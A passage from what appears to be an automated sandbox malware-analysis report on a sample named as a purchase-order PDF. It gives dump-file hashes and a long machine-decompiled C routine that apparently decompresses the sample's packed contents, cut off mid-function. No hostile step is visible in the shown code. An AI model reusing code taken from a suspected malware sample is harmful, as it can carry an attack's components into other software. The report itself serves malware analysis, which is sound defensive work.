                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                            • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                            • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                            • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E00407395() {
                                            				void _t533;
                                            				signed int _t534;
                                            				signed int _t535;
                                            				signed int* _t605;
                                            				void* _t612;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t612 - 0x40) != 0) {
                                            						 *(_t612 - 0x84) = 0x13;
                                            						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                            						goto L132;
                                            					} else {
                                            						__eax =  *(__ebp - 0x4c);
                                            						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            						__ecx =  *(__ebp - 0x58);
                                            						__eax =  *(__ebp - 0x4c) << 4;
                                            						__eax =  *(__ebp - 0x58) + __eax + 4;
                                            						L130:
                                            						 *(__ebp - 0x58) = __eax;
                                            						 *(__ebp - 0x40) = 3;
                                            						L144:
                                            						 *(__ebp - 0x7c) = 0x14;
                                            						L145:
                                            						__eax =  *(__ebp - 0x40);
                                            						 *(__ebp - 0x50) = 1;
                                            						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            						L149:
                                            						if( *(__ebp - 0x48) <= 0) {
                                            							__ecx =  *(__ebp - 0x40);
                                            							__ebx =  *(__ebp - 0x50);
                                            							0 = 1;
                                            							__eax = 1 << __cl;
                                            							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            							__eax =  *(__ebp - 0x7c);
                                            							 *(__ebp - 0x44) = __ebx;
                                            							while(1) {
                                            								L140:
                                            								 *(_t612 - 0x88) = _t533;
                                            								while(1) {
                                            									L1:
                                            									_t534 =  *(_t612 - 0x88);
                                            									if(_t534 > 0x1c) {
                                            										break;
                                            									}
                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                            										case 0:
                                            											if( *(_t612 - 0x6c) == 0) {
                                            												goto L170;
                                            											}
                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                            											_t534 =  *( *(_t612 - 0x70));
                                            											if(_t534 > 0xe1) {
                                            												goto L171;
                                            											}
                                            											_t538 = _t534 & 0x000000ff;
                                            											_push(0x2d);
                                            											asm("cdq");
                                            											_pop(_t569);
                                            											_push(9);
                                            											_pop(_t570);
                                            											_t608 = _t538 / _t569;
                                            											_t540 = _t538 % _t569 & 0x000000ff;
                                            											asm("cdq");
                                            											_t603 = _t540 % _t570 & 0x000000ff;
                                            											 *(_t612 - 0x3c) = _t603;
                                            											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                            											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                            											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                            											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                            												L10:
                                            												if(_t611 == 0) {
                                            													L12:
                                            													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                            													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                            													goto L15;
                                            												} else {
                                            													goto L11;
                                            												}
                                            												do {
                                            													L11:
                                            													_t611 = _t611 - 1;
                                            													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                            												} while (_t611 != 0);
                                            												goto L12;
                                            											}
                                            											if( *(_t612 - 4) != 0) {
                                            												GlobalFree( *(_t612 - 4));
                                            											}
                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                            											 *(_t612 - 4) = _t534;
                                            											if(_t534 == 0) {
                                            												goto L171;
                                            											} else {
                                            												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                            												goto L10;
                                            											}
                                            										case 1:
                                            											L13:
                                            											__eflags =  *(_t612 - 0x6c);
                                            											if( *(_t612 - 0x6c) == 0) {
                                            												 *(_t612 - 0x88) = 1;
                                            												goto L170;
                                            											}
                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                            											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                            											_t45 = _t612 - 0x48;
                                            											 *_t45 =  *(_t612 - 0x48) + 1;
                                            											__eflags =  *_t45;
                                            											L15:
                                            											if( *(_t612 - 0x48) < 4) {
                                            												goto L13;
                                            											}
                                            											_t546 =  *(_t612 - 0x40);
                                            											if(_t546 ==  *(_t612 - 0x74)) {
                                            												L20:
                                            												 *(_t612 - 0x48) = 5;
                                            												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                            												goto L23;
                                            											}
                                            											 *(_t612 - 0x74) = _t546;
                                            											if( *(_t612 - 8) != 0) {
                                            												GlobalFree( *(_t612 - 8));
                                            											}
                                            											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                            											 *(_t612 - 8) = _t534;
                                            											if(_t534 == 0) {
                                            												goto L171;
                                            											} else {
                                            												goto L20;
                                            											}
                                            										case 2:
                                            											L24:
                                            											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                            											 *(_t612 - 0x84) = 6;
                                            											 *(_t612 - 0x4c) = _t553;
                                            											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                            											goto L132;
                                            										case 3:
                                            											L21:
                                            											__eflags =  *(_t612 - 0x6c);
                                            											if( *(_t612 - 0x6c) == 0) {
                                            												 *(_t612 - 0x88) = 3;
                                            												goto L170;
                                            											}
                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                            											_t67 = _t612 - 0x70;
                                            											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                            											__eflags =  *_t67;
                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                            											L23:
                                            											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                            											if( *(_t612 - 0x48) != 0) {
                                            												goto L21;
                                            											}
                                            											goto L24;
                                            										case 4:
                                            											L133:
                                            											_t531 =  *_t605;
                                            											_t588 = _t531 & 0x0000ffff;
                                            											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                            											if( *(_t612 - 0xc) >= _t564) {
                                            												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                            												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                            												 *(_t612 - 0x40) = 1;
                                            												_t532 = _t531 - (_t531 >> 5);
                                            												__eflags = _t532;
                                            												 *_t605 = _t532;
                                            											} else {
                                            												 *(_t612 - 0x10) = _t564;
                                            												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                            												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                            											}
                                            											if( *(_t612 - 0x10) >= 0x1000000) {
                                            												goto L139;
                                            											} else {
                                            												goto L137;
                                            											}
                                            										case 5:
                                            											L137:
                                            											if( *(_t612 - 0x6c) == 0) {
                                            												 *(_t612 - 0x88) = 5;
                                            												goto L170;
                                            											}
                                            											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                            											L139:
                                            											_t533 =  *(_t612 - 0x84);
                                            											goto L140;
                                            										case 6:
                                            											__edx = 0;
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) = 1;
                                            												 *(__ebp - 0x84) = 7;
                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            												goto L132;
                                            											}
                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            											__esi =  *(__ebp - 0x60);
                                            											__cl = 8;
                                            											__cl = 8 -  *(__ebp - 0x3c);
                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            											__ecx =  *(__ebp - 0x3c);
                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            											__ecx =  *(__ebp - 4);
                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            											__eflags =  *(__ebp - 0x38) - 4;
                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											if( *(__ebp - 0x38) >= 4) {
                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                            												if( *(__ebp - 0x38) >= 0xa) {
                                            													_t98 = __ebp - 0x38;
                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                            													__eflags =  *_t98;
                                            												} else {
                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            												}
                                            											} else {
                                            												 *(__ebp - 0x38) = 0;
                                            											}
                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                            											if( *(__ebp - 0x34) == __edx) {
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												goto L61;
                                            											} else {
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__ecx =  *(__ebp - 8);
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            												goto L41;
                                            											}
                                            										case 7:
                                            											__eflags =  *(__ebp - 0x40) - 1;
                                            											if( *(__ebp - 0x40) != 1) {
                                            												__eax =  *(__ebp - 0x24);
                                            												 *(__ebp - 0x80) = 0x16;
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												__eax =  *(__ebp - 0x2c);
                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            												__eax =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 4) + 0x664;
                                            												__eflags = __eax;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L69;
                                            											}
                                            											__eax =  *(__ebp - 4);
                                            											__ecx =  *(__ebp - 0x38);
                                            											 *(__ebp - 0x84) = 8;
                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            											goto L132;
                                            										case 8:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xa;
                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            											} else {
                                            												__eax =  *(__ebp - 0x38);
                                            												__ecx =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                            												 *(__ebp - 0x84) = 9;
                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            											}
                                            											goto L132;
                                            										case 9:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												goto L90;
                                            											}
                                            											__eflags =  *(__ebp - 0x60);
                                            											if( *(__ebp - 0x60) == 0) {
                                            												goto L171;
                                            											}
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                            											__eflags = _t259;
                                            											0 | _t259 = _t259 + _t259 + 9;
                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                            											goto L76;
                                            										case 0xa:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xb;
                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            												goto L132;
                                            											}
                                            											__eax =  *(__ebp - 0x28);
                                            											goto L89;
                                            										case 0xb:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__ecx =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x20);
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            											} else {
                                            												__eax =  *(__ebp - 0x24);
                                            											}
                                            											__ecx =  *(__ebp - 0x28);
                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            											L89:
                                            											__ecx =  *(__ebp - 0x2c);
                                            											 *(__ebp - 0x2c) = __eax;
                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            											L90:
                                            											__eax =  *(__ebp - 4);
                                            											 *(__ebp - 0x80) = 0x15;
                                            											__eax =  *(__ebp - 4) + 0xa68;
                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            											goto L69;
                                            										case 0xc:
                                            											L100:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xc;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t335 = __ebp - 0x70;
                                            											 *_t335 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t335;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											__eax =  *(__ebp - 0x2c);
                                            											goto L102;
                                            										case 0xd:
                                            											L37:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xd;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t122 = __ebp - 0x70;
                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t122;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L39:
                                            											__eax =  *(__ebp - 0x40);
                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            												goto L48;
                                            											}
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												goto L54;
                                            											}
                                            											L41:
                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            											 *(__ebp - 0x48) = __eax;
                                            											__eax = __eax + 1;
                                            											__eax = __eax << 8;
                                            											__eax = __eax + __ebx;
                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edx = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												 *(__ebp - 0x40) = 1;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												__ebx = __ebx + __ebx + 1;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edx;
                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L39;
                                            											} else {
                                            												goto L37;
                                            											}
                                            										case 0xe:
                                            											L46:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xe;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t156 = __ebp - 0x70;
                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t156;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											while(1) {
                                            												L48:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													break;
                                            												}
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t170 = __edx + 1; // 0x1
                                            													__ebx = _t170;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													continue;
                                            												} else {
                                            													goto L46;
                                            												}
                                            											}
                                            											L54:
                                            											_t173 = __ebp - 0x34;
                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            											__eflags =  *_t173;
                                            											goto L55;
                                            										case 0xf:
                                            											L58:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xf;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t203 = __ebp - 0x70;
                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t203;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L60:
                                            											__eflags = __ebx - 0x100;
                                            											if(__ebx >= 0x100) {
                                            												L55:
                                            												__al =  *(__ebp - 0x44);
                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            												goto L56;
                                            											}
                                            											L61:
                                            											__eax =  *(__ebp - 0x58);
                                            											__edx = __ebx + __ebx;
                                            											__ecx =  *(__ebp - 0x10);
                                            											__esi = __edx + __eax;
                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                            											__ax =  *__esi;
                                            											 *(__ebp - 0x54) = __esi;
                                            											__edi = __ax & 0x0000ffff;
                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                            											if( *(__ebp - 0xc) >= __ecx) {
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            												__cx = __ax;
                                            												_t217 = __edx + 1; // 0x1
                                            												__ebx = _t217;
                                            												__cx = __ax >> 5;
                                            												__eflags = __eax;
                                            												 *__esi = __ax;
                                            											} else {
                                            												 *(__ebp - 0x10) = __ecx;
                                            												0x800 = 0x800 - __edi;
                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            												__ebx = __ebx + __ebx;
                                            												 *__esi = __cx;
                                            											}
                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            											 *(__ebp - 0x44) = __ebx;
                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                            												goto L60;
                                            											} else {
                                            												goto L58;
                                            											}
                                            										case 0x10:
                                            											L110:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0x10;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t366 = __ebp - 0x70;
                                            											 *_t366 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t366;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											goto L112;
                                            										case 0x11:
                                            											L69:
                                            											__esi =  *(__ebp - 0x58);
                                            											 *(__ebp - 0x84) = 0x12;
                                            											L132:
                                            											 *(_t612 - 0x54) = _t605;
                                            											goto L133;
                                            										case 0x12:
                                            											goto L0;
                                            										case 0x13:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												_t469 = __ebp - 0x58;
                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            												__eflags =  *_t469;
                                            												 *(__ebp - 0x30) = 0x10;
                                            												 *(__ebp - 0x40) = 8;
                                            												goto L144;
                                            											}
                                            											__eax =  *(__ebp - 0x4c);
                                            											__ecx =  *(__ebp - 0x58);
                                            											__eax =  *(__ebp - 0x4c) << 4;
                                            											 *(__ebp - 0x30) = 8;
                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            											goto L130;
                                            										case 0x14:
                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            											__eax =  *(__ebp - 0x80);
                                            											L140:
                                            											 *(_t612 - 0x88) = _t533;
                                            											goto L1;
                                            										case 0x15:
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            											__al = __al & 0x000000fd;
                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            											goto L121;
                                            										case 0x16:
                                            											__eax =  *(__ebp - 0x30);
                                            											__eflags = __eax - 4;
                                            											if(__eax >= 4) {
                                            												_push(3);
                                            												_pop(__eax);
                                            											}
                                            											__ecx =  *(__ebp - 4);
                                            											 *(__ebp - 0x40) = 6;
                                            											__eax = __eax << 7;
                                            											 *(__ebp - 0x7c) = 0x19;
                                            											 *(__ebp - 0x58) = __eax;
                                            											goto L145;
                                            										case 0x17:
                                            											goto L145;
                                            										case 0x18:
                                            											L146:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0x18;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t484 = __ebp - 0x70;
                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t484;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L148:
                                            											_t487 = __ebp - 0x48;
